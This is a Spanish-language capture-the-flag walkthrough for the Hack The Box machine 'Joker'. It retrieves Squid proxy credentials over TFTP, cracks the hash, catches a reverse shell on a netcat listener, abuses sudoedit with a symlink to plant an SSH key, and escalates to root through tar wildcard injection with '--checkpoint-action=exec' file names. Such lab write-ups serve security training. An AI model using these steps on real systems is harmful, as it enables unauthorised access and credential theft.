Joker

#hard #linux #tftp #squidProxy #sudoedit #tar

https://app.hackthebox.com/machines/Joker

---

Enumeración de puertos y servicios

sudo nmap -sSU -T4 -A -Pn -n -vv 10.129.1.116 -oA allPorts

PORT      STATE         SERVICE         REASON         VERSION
22/tcp    open          ssh             syn-ack ttl 63 OpenSSH 7.3p1 Ubuntu 1ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 88:24:e3:57:10:9f:1b:17:3d:7a:f3:26:3d:b6:33:4e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDSF43c4+2T8wvIChFBroKwvO52vc9j6UIFY1neTYtPLs/XwN+duCl6Ncxb4uzw8/tN6AH/VNBkKqVecm6oqVdj9q/qZgGIm739suj+nKMoEY8w+B3UnZTriFBnoDof3N/EPfAYbQqcMge17F1IX8HencfyVzsh8tTkmDYHnPqbuwiO4dkhCjs7zr38uHdDoYao7NbLM+EOOxECwbu8+hmUahx9hpBmvkO0lVvuLdhfOggRaQR7nOjd26SnClq+SUoGqv3eIr+jbGvngjyh1PJcoIkxuvPZWko2D3+Uem3tjZEU7IFylX7wFnsmb7kfs+m2aYIV1g89KDP7RrWAJUHD
|   256 76:b6:f6:08:00:bd:68:ce:97:cb:08:e7:77:69:3d:8a (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLrlLfBGlkNls7ttTNUwr7+qTJaN7Nqlj2Eyo4e9NBTlwIGP2QLgNPTUF3u1XfQThwQEbQ4SrwvfQxZqdQNNygE=
|   256 dc:91:e4:8d:d0:16:ce:cf:3d:91:82:09:23:a7:dc:86 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGI19rwyGSLg0kosaUbhH+G7JSebxhso8m559KQxqBOI
3128/tcp  open          http-proxy      syn-ack ttl 63 Squid http proxy 3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/3.5.12
68/udp    open|filtered dhcpc           no-response
69/udp    open          tftp            script-set     Netkit tftpd or atftpd
| tftp-version: 
|   cpe: 
|     cpe:/a:netkit:netkit
|     cpe:/a:lefebvre:atftpd
|_  p: Netkit tftpd or atftpd
199/udp   open|filtered smux            no-response
688/udp   open|filtered realm-rusd      no-response
814/udp   open|filtered unknown         no-response
1433/udp  open|filtered ms-sql-s        no-response
5355/udp  open|filtered llmnr           no-response
17207/udp open|filtered unknown         no-response
19717/udp open|filtered unknown         no-response
20424/udp open|filtered unknown         no-response
27482/udp open|filtered unknown         no-response
27892/udp open|filtered unknown         no-response
29078/udp open|filtered unknown         no-response
32779/udp open|filtered sometimes-rpc22 no-response
34579/udp open|filtered unknown         no-response
39632/udp open|filtered unknown         no-response
41971/udp open|filtered unknown         no-response
49181/udp open|filtered unknown         no-response
49222/udp open|filtered unknown         no-response
54114/udp open|filtered unknown         no-response
60381/udp open|filtered unknown         no-response
61412/udp open|filtered unknown         no-response

atftp 10.129.1.116
tftp> get /etc/squid/squid.conf
tftp> get /etc/squid/passwords

cat passwords
kalamari:$apr1$zyzBxQYW$pL360IoLQ5Yum5SLTph.l0

echo '$apr1$zyzBxQYW$pL360IoLQ5Yum5SLTph.l0' > hash.txt

hashcat -m 1600 hash.txt /usr/share/wordlists/rockyou.txt

$apr1$zyzBxQYW$pL360IoLQ5Yum5SLTph.l0:ihateseafood

User: kalamari
Password: ihateseafood

ffuf -u http://127.0.0.1:80/FUZZ -x http://kalamari:ihateseafood@10.129.1.116:3128 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 80 -c -ic -fw 332

list                    [Status: 301, Size: 251, Words: 22, Lines: 4, Duration: 247ms]
console                 [Status: 200, Size: 1479, Words: 231, Lines: 35, Duration: 235ms]

En Firefox ejecutar about:config, y poner en true network.proxy.allow_hijacking_localhost para permitir que el proxy redirija tráfico a localhost o 127.0.0.1.

http://127.0.0.1/console

Ponerse en escucha en la máquina atacante

nc -lvnp 1111 -u

nc -lvnp 1111 -u
Received packet from 10.129.168.149:42703 -> 10.10.14.183:1111 (local)
/bin/sh: 0: can't access tty; job control turned off
$ 

Shell interactiva estable

werkzeug@joker:~$ sudo -lMatching Defaults entries for werkzeug on joker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    sudoedit_follow, !sudoedit_checkdir

User werkzeug may run the following commands on joker:
    (alekos) NOPASSWD: sudoedit /var/www/*/*/layout.html

searchsploit sudoedit

Sudo 1.8.14 (RHEL 5/6/7 / Ubuntu) - 'Sudoedit' Unauthorized Privilege Escalation                                                                         | linux/local/37710.txt

Crear clave pública y privada en la máquina atacante

ssh-keygen -t ed25519 -f joker -N "" -C "joker@joker.com"

Copiar la clave pública y pegarla ejecutando sudoedit -u alekos /var/www/testing/melvin/layout.html en la máquina víctima

cat joker.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJUiwoCL9gEf/grflp7p/aq0RJtQUAPdd851qAnRw6CE joker@joker.com

werkzeug@joker:~/testing$ mkdir melvin
werkzeug@joker:~/testing$ cd melvin/
werkzeug@joker:~/testing/melvin$ ln -s /home/alekos/.ssh/authorized_keys layout.html
werkzeug@joker:~/testing/melvin$ sudoedit -u alekos /var/www/testing/melvin/layout.html 
Unable to create directory /var/www/.nano: Permission denied
It is required for saving/loading search history or cursor positions.

Press Enter to continue

ssh -i joker alekos@10.129.168.149

alekos@joker:~$ ls
backup  development  user.txt
alekos@joker:~$ cat user.txt

User flag

6ddb************************3baa

Privilege Escalation

alekos@joker:~/development$ nano melvin.sh

#!/bin/sh

cat /root/root.txt > /home/alekos/development/melvin.flag.txt
chmod 777 /home/alekos/development/writeup.flag.txt

alekos@joker:~/development$ touch -- --checkpoint=1
alekos@joker:~/development$ touch -- '--checkpoint-action=exec=sh melvin.sh'

Esperar 5 minutos a que se realice la copia de seguridad

alekos@joker:~/development$ cat melvin.flag.txt

Root flag

55e0************************0edb